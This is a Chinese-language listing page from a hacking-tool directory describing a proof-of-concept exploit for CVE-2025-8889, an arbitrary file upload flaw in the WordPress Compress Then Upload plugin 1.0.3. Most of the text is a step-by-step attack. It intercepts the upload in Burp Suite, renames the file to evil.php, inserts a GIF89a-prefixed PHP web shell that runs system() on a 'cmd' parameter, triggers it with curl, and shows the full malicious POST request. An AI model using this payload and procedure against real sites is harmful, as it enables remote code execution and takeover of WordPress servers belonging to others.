Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8889 — CVE-2025-8889 的概念验证利用:WordPress Compress Then Upload 插件 1.0.3 中的任意文件上传导致远程代码执行。包含使用 Burp Suite 绕过 MIME 验证并执行 PHP 代码的逐步 PoC。 | Kitploit
工具/GitHubGitHub/siberkampus/cve-2025-8889
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubsiberkampus/cve-2025-8889

CVE-2025-8889

CVE-2025-8889 的概念验证利用:WordPress Compress Then Upload 插件 1.0.3 中的任意文件上传导致远程代码执行。包含使用 Burp Suite 绕过 MIME 验证并执行 PHP 代码的逐步 PoC。

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞利用标题:WordPress Compress Then Upload Plugin 1.0.3 任意文件上传至远程代码执行

日期: 2025-07-23
漏洞利用作者: Muhammed Çelik
厂商主页: https://wordpress.com/plugins/compress-then-upload
软件链接: https://downloads.wordpress.org/plugin/compress-then-upload.latest-stable.zip
版本: 1.0.3
测试环境: Debian, WordPress 6.8.1, Apache 2.4.62, PHP 8.2.28
CVE: CVE-2025-8889

漏洞描述

WordPress "Compress Then Upload Images" 插件未能正确验证通过其媒体上传接口上传图片时的文件扩展名和MIME类型。虽然存在客户端验证,但可以通过拦截并修改上传请求来绕过。

经过身份验证且具有媒体上传权限(作者角色或更高)的用户可以利用此漏洞:

  1. 首先上传一个正常的图片文件
  2. 拦截上传请求(例如通过 Burp Suite)
  3. 修改上传文件名扩展名和文件内容以包含恶意 PHP 代码
  4. 保留原始 MIME 类型头(image/jpeg)以绕过弱服务端检查
  5. 导致服务器上任意 PHP 代码执行(远程代码执行,RCE)

PoC

步骤 1:准备一个普通的图片文件
创建一个普通的图片文件,例如 regular.jpg(任何有效的 JPG 文件)。

步骤 2:通过 WordPress 管理面板上传普通图片

  • 使用至少具有作者权限的用户登录 WordPress 管理面板。
  • 导航到 媒体 > Compress Then Upload Images(插件的上传界面)。
  • 正常上传 regular.jpg。

步骤 3:使用 Burp Suite 拦截并修改上传请求

  • 在上传过程中,在 Burp Suite 中拦截 HTTP multipart 请求。
  • 修改请求:
    • 将 filename="regular.jpg" 改为 filename="evil.php"
    • 将文件内容替换为 PHP web shell 代码:
root@kitploit:~
GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }


注意:`GIF89a;` 模拟一个有效的 GIF 头部以绕过弱图像验证。
保持 Content-Type 为 image/jpeg。

将修改后的请求发送到服务器。

**步骤 4:触发上传的 web shell**

如果上传成功,PHP 文件将被保存在 uploads 目录,例如:
http://target-site.com/wp-content/uploads/2025/07/evil.php

通过浏览器或 curl 访问:

curl "http://target-site.com/wp-content/uploads/2025/07/evil.php?cmd=id"

**恶意上传请求示例(Burp Suite)**

POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
...
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>
?>
下载工具